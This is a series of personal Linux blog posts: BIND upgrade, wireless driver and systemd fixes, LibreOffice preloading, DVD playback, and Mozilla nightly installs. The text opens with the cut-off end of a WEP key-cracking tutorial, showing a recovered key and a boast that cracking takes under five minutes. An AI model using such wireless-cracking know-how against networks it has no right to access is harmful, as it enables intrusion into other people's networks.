KEY FOUND! [ 2C:BD:3D:AC:D5:97:59:57:28:CE:3C:B9:F5 ]
Decrypted correctly: 100%

That’s it… You’re all done…

It takes less then 5 minutes to crack WEP key… 5 minutes guys and girls… and Your wireless network has been compromised… Now please tell me that You have changed the default administrator’s password for the router? Please please tell me You did at least that…

Cheers.

AndrzejL

[PCLinuxOS] Manually upgrading Bind / Named to version 9.9.2-P2 [Security patches].

Hi folks.

Latest Bind / Named version was released several days ago to patch this vulnerability.

I will try to show how to download, extract, configure and install the latest version.

Open terminal window and follow this set of instructions:

su

root's password

export PREFIX=`echo /usr/`

export PATH=$PREFIX/bin:$PATH

export PKG_CONFIG_PATH=$PREFIX/lib/pkgconfig:$PREFIX/share/pkgconfig

cd /opt/

mkdir Bind

cd Bind

wget -c ftp://ftp.isc.org/isc/bind9/9.9.2-P2/bind-9.9.2-P2.tar.gz

tar xvzf ./bind-9.9.2-P2.tar.gz

cd bind-9.9.2-P2

./configure --prefix=$PREFIX --sysconfdir=/etc/

You can expect missing dependencies here. I had no problems whatsoever as I have a good few “devel” packages installed – try figuring out what You’re missing if You do run into a snag, then install it from Synaptic (without closing this window) and re-run the above configure step till there are no errors.

make

make install

ls --full /var/lib/named/var/

one of the listed items should look like this:

drwxr-xr-x 7 root root 4096 2013-03-22 09:08:02.163308440 +0100 named/

ls --full /var/lib/named/var/named

chown named:named /var/lib/named/var/named/

drwxr-xr-x 7 named named 4096 2013-03-22 09:08:08.221303100 +0100 named/

Now in this terminal window type in

named -v

the reply should look like this:

BIND 9.9.2-P2

service named restart

and the reply should look something like this:

Stopping named: [ Failed ]
Starting named: [ OK ]

This should be it… You have compiled and are running latest patched version of Bind…

Regards.

Andy

Solving the ieee80211 xyz0: abc0: No probe response from AP xx:yy:zz:aa:bb:cc after 500ms, disconnecting – wireless dropouts.

Hi all.

I have this Belkin rt73usb card – it’s connected to this SUPER OLD Thinkpad 600E machine and it’s associated always with only one router – static IP setup – basically laptop is stationary / not moved. I had little problems with connecting it to the network at boot time but thanks to Boohbah from #Archlinux channel and a bit of research I got it to connect and to turn off power management and to keep the rate as “fixed” 54M – worked well BUT… I had a problem with it – the connection stayed up – I could browse the internet from the thinkpad / I could access the sshfs share on my server (from Thinkpad 600E) and so on but after a while sshd port – 50505 in my case – was switching from open into filtered and I could not connect to it anymore.

Example – rebooted Thinkpad 600E – i can connect – Thinkpad was left alone for lets say sometimes 10 minutes – sometimes an hour – connection was active but I could not ssh to the machine anymore.

After a bit of investigating I have found this line in the dmesg (after the connection dropped)

ieee80211 xyz0: abc0: No probe response from AP xx:yy:zz:aa:bb:cc after 500ms, disconnecting

and I had googled it but could not find solution so I have asked for help on the Arch Linux forum and Strike0 has sorted me out in no time. Thanks Dude!

I am reposting the info here just in case forum post goes missing in the future. To solve this issue I had to do this:

As root add:

options rt73usb nohwcrypt=1

to the file:

/etc/modprobe.d/modprobe.conf

and save it. Then re-create kernel image with

mkinitcpio -p linux

and reboot.

Hope someone will find it useful in the future.

Regards.

Andrzej

[UPDATED] Bloody RT73 USB dongle wouldn’t connect at boot time.

Hi all.

I own this dongle:

Bus 001 Device 003: ID 148f:2573 Ralink Technology, Corp. RT2501/RT2573 Wireless Adapter

It’s plugged in to my “stationary” IBM Thinkpad 600E laptop. Only one network. Static IP. It would connect to internet when system was booted fully but not during boot time.

BIG thanks to Boohbah he sorted me out when I was loosing all hope…

To solve this issue I had to do this (as root):

Create two files:

/etc/systemd/system/network@wlan0.service

With content:

[Unit]
Description=Network Connectivity (%i)
Wants=network.target
Before=network.target
BindsTo=sys-subsystem-net-devices-%i.device
After=sys-subsystem-net-devices-%i.device

[Service]
Type=oneshot
RemainAfterExit=yes
EnvironmentFile=/etc/conf.d/network
ExecStart=/sbin/ip link set dev ${interface} up
ExecStart=/usr/sbin/wpa_supplicant -B -i ${interface} -c /etc/wpa_supplicant.conf
ExecStart=/sbin/ip addr add ${address}/${netmask} broadcast ${broadcast} dev ${interface}
ExecStart=/sbin/ip route add default via ${gateway}
ExecStart=/usr/sbin/iwconfig ${interface} power off
ExecStart=/usr/sbin/iwconfig ${interface} rate 1M fixed
ExecStop=/sbin/ip addr flush dev ${interface}
ExecStop=/sbin/ip link set dev ${interface} down

[Install]
WantedBy=multi-user.target

and

/etc/conf.d/network

with content:

interface=wlan0
address=192.168.0.102
netmask=24
broadcast=192.168.0.255
gateway=192.168.0.1

Your IP / gateway may vary. You will also have to edit file:

/etc/resolv.conf

So it contains DNS servers that You’re using. Example:

nameserver 192.168.0.1

and then enable service:

systemctl enable network@wlan0.service

and reboot.

After the reboot my card was connected.

[root@wishthinkpad andrzejl]# journalctl -b | grep wlan0
Jan 05 04:31:50 wishthinkpad.loc systemd[1]: Expecting device sys-subsystem-net-devices-wlan0.device…
Jan 05 04:32:03 wishthinkpad.loc systemd[1]: Starting Network Connectivity (wlan0)…
Jan 05 04:32:03 wishthinkpad.loc kernel: IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
Jan 05 04:32:04 wishthinkpad.loc systemd[1]: Started Network Connectivity (wlan0).
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: authenticate with 00:18:39:a0:db:3e
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: send auth to 00:18:39:a0:db:3e (try 1/3)
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: authenticated
Jan 05 04:32:06 wishthinkpad.loc kernel: rt73usb 1-1.1:1.0: wlan0: disabling HT as WMM/QoS is not supported
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: associate with 00:18:39:a0:db:3e (try 1/3)
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: RX AssocResp from 00:18:39:a0:db:3e (capab=0x411 status=0 aid=1)
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: associated
Jan 05 04:32:06 wishthinkpad.loc kernel: IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready
[root@wishthinkpad andrzejl]#

Thanks again Boohbah I wouldn’t be able to solve that without You.

Hopefully someone else can use it in the future.

Regards.

Andrzej

EDIT 01: Adding pci=noacpi as a kernel parameter seems to make this temperamental USB device to behave slightly better…
EDIT 02: Power management needs to be disabled and the rate must be brought down to 1M otherwise card disconnects AND looses pings.

Cool trick – speeding up LibreOffice by pre-loading it during boot.

Hi all.

I have decided to speed up opening of the LibreOffice and its components by pre-loading it after I log into my system.

This is not a trick for people with low ram machines. Why? It pre-loads LibreOffice on system start and keeps it in the memory so unless you are willing to sacrifice something between 64256 MB of RAM – this how-to is not for You.

Still interested? Great. Do this:

Open terminal and run those commands:

touch ~/.config/autostart/preload_libreoffice.sh

chmod +x ~/.config/autostart/preload_libreoffice.sh

mcedit ~/.config/autostart/preload_libreoffice.sh

Now copy this:

#!/bin/sh
sleep 15
loffice --nodefault --nologo &
PID=$!
sleep 10
kill $PID

Click on the mcedit window and press SHIFT + INS(ERT). Content of the clipboard should now be pasted into the mcedit. Now press F2 to invoke saving dialog. Now press F10 to invoke closing dialog.

Mcedit - Saving the script

Close the terminal and open any part of the LibreOffice (writer, calc, draw whatever ails you…) and click Tools > Options from the menu bar. Now in the LibreOffice menu find and click Memory. See the Use for LibreOffice box? Change it’s value to something like 64, 128 or 256. Now OK the Options window and close LibreOffice.

LibreOffice - Memory Settings

Now reboot Your machine and log into it. Give it some time (15 seconds) to run the script in the background and try opening LibreOffice component… It should start in less then 1 second.

Regards.

Andrzej

Playing DVD Videos in SMPlayer. Adding SMPlayer entry in KDE’s Device Notifier.

Hi folks.

I have installed Arch Linux few days ago. I am loving it.

By default SMPlayer won’t play DVD videos neither will it have entry in the KDE4 Device Notifier to do so. Here is how I got it to work:

I assume You have a fully upgraded system.

Run this:

su

Now give it root’s password.

Now run this:

pacman -S smplayer libdvdcss libdvdnav libdvdread

and agree to install all the packages and their dependencies.

Now run this:

mcedit /etc/udev/rules.d/82-cdrom.rules

and paste this as a content:

SUBSYSTEM=="block", KERNEL=="sr0", SYMLINK+="cdrom cdrw dvd dvdrw"

Big thank You to sudokode for helping me with the udev rule.

Now save the file and close editor (F2 to save, F10 to exit). You can use any other text editor like vi, nano etc.

Now if You’re not using KDE4 and You do not need or want the Device Notifier entry You can reboot. SMPlayer will be able to play Your dvd videos now.

For those that want and need the Device Notifier entry please continue in the same terminal.

Run this:

mkdir -p /usr/share/apps/solid/actions/

mcedit /usr/share/apps/solid/actions/smplayer_play_dvd.desktop

and paste this:

[Desktop Entry]
Type=Service
Actions=PlayDVD;
X-KDE-Solid-Predicate=OpticalDisc.availableContent & 'VideoDvd'
[Desktop Action PlayDVD]
Name=Play DVD with SMPlayer
Exec=smplayer dvd://%U
Icon=smplayer

Now save the file and close editor (F2 to save, F10 to exit). You can use any other text editor like vi, nano etc.

Reboot Your machine.

Now when You insert DVD disc into the drive Device Notifier will ask You what do You want to do. One of the options should be to “Play DVD with SMPlayer”

Regards.

Andrzej

Testing Mozilla Thunderbird Central Daily 20 safely on PCLinuxOS 2012.x

Hi all.

I wanted to test the latest version of the e-mail client from Mozilla. I am a huge fan of Thunderbird and it always was my main e-mail client. PCLinuxOS comes with the latest stable version. Its a good thing. I love stability of my distribution. However I want to try the newest Mozilla product before it becomes a default for PCLinuxOS. Also I want to help Mozilla Developers by filing a bug reports and make their products even better this way.

Here are few simple steps You can do if You want to test it too.

Thunderbird is a default PCLinuxOS e-mail client so its installed by default. If You removed it – reinstall it via synaptic.

Older version must be installed for few minor yet important reasons.

Close Thunderbird completely. Now open console and run these commands:

cd

Go to Your /home/ folder

This version of Thunderbird is a bleeding edge release so ride might be little bumpy. I never noticed any problems but just to be on the safe side…

cp -R ~/.thunderbird ~/.thunderbird.backup.20

let’s backup Your profile first.

wget -c http://ftp.mozilla.org/pub/mozilla.org/thunderbird/nightly/latest-comm-central/thunderbird-20.0a1.en-US.linux-i686.tar.bz2

Download the compressed Daily XX file.

tar -xvjf ./thunderbird-20.0a1.en-US.linux-i686.tar.bz2

Extract it.

rm -f ./thunderbird-20.0a1.en-US.linux-i686.tar.bz2

Remove it.

su

Gain root privileges…

root password

…by giving correct root password.

rm -f /usr/bin/thunderbird

Remove old executable.

rm -f /usr/bin/mozilla-thunderbird

Remove old executable.

ln -s /home/yourlogin/thunderbird/thunderbird /usr/bin/thunderbird

Create symlink to a new executable in Your home folder. Replace yourlogin with Your actual login.

ln -s /home/yourlogin/thunderbird/mozilla-thunderbird /usr/bin/mozilla-thunderbird

Create symlink to a new executable in Your home folder. Replace yourlogin with Your actual login.

exit

exit

Go back to user mode and close the console.

Now You can use the old shortcuts (from the desktop, panel or KMenu) to open new Thunderbird. All the programs should open the mailto: links in new version of Thunderbird too.

Enjoy the latest and the greatest from Mozilla. I am. If You are using Daily You should know that it can also be safely upgraded to the latest version by using Help > About Daily from the Thunderbird menu bar.

Thunderbird 20 Daily on PCLinuxOS 2011.x

Going back to the repo version of Thunderbird.

Close Thunderbird completely. Reinstall Thunderbird using Synaptic.

Regards.

Andy

Testing Mozilla Firefox Nightly 20 safely on PCLinuxOS 2012.x

Hi all.

I wanted to test the latest browser from Mozilla. I am a huge fan of Firefox and it always was my main browser. PCLinuxOS comes with the latest stable version. Its a good thing. I love stability of my distribution. However I want to try the newest Mozilla product before it becomes a default browser for PCLinuxOS. Also I want to help Mozilla Developers by filing a bug reports and make their products even better this way.

Here are few simple steps You can do if You want to test it too.

Firefox is a default PCLinuxOS browser so its installed by default. If You removed it – reinstall it via synaptic.

Older version must be installed for few minor yet important reasons.

Close Firefox browser completely. Now open console and run these commands:

cd

Go to Your /home/ folder

cp -R ~/.mozilla ~/.mozilla.backup.20

Let’s backup Your profile first.

wget -c http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/firefox-20.0a1.en-US.linux-i686.tar.bz2

Download the compressed Nightly XX file.

tar -xvjf ./firefox-20.0a1.en-US.linux-i686.tar.bz2

Extract it.

rm -f ./firefox-20.0a1.en-US.linux-i686.tar.bz2

Remove it.

cd ~/firefox/searchplugins/ && wget -c http://andrzejl.cyryl.net/WoTW/WoTW_files/FFxSearchPCLOSForum/pclinuxos-forum.xml

Add the search engine for PCLinuxOS Forum.

su

Gain root privileges…

root password

…by giving correct root password.

rm -f /usr/bin/firefox

Remove old symlink.

rm -f /usr/bin/mozilla-firefox

Remove old symlink.

ln -s /home/yourlogin/firefox/firefox /usr/bin/firefox

Create new symlink. Replace yourlogin with Your actual login.

ln -s /home/yourlogin/firefox/firefox /usr/bin/mozilla-firefox

Create new symlink. Replace yourlogin with Your actual login.

exit

exit

Go back to user mode and close the console.

Now You can use the old shortcuts (from the desktop, panel or KMenu) to open new Firefox. All the programs should open links in new version of Firefox too.

Enjoy the latest and the greatest from Mozilla. I am. If You are using Nightly You should know that it can also be safely upgraded to the latest version by using Help > About Nightly from the Firefox menu bar.

Firefox 20 Nightly on PCLinuxOS 2011.x

Going back to the repo version of Firefox.

Close Firefox completely. Reinstall Firefox using synaptic.

Regards.

Andy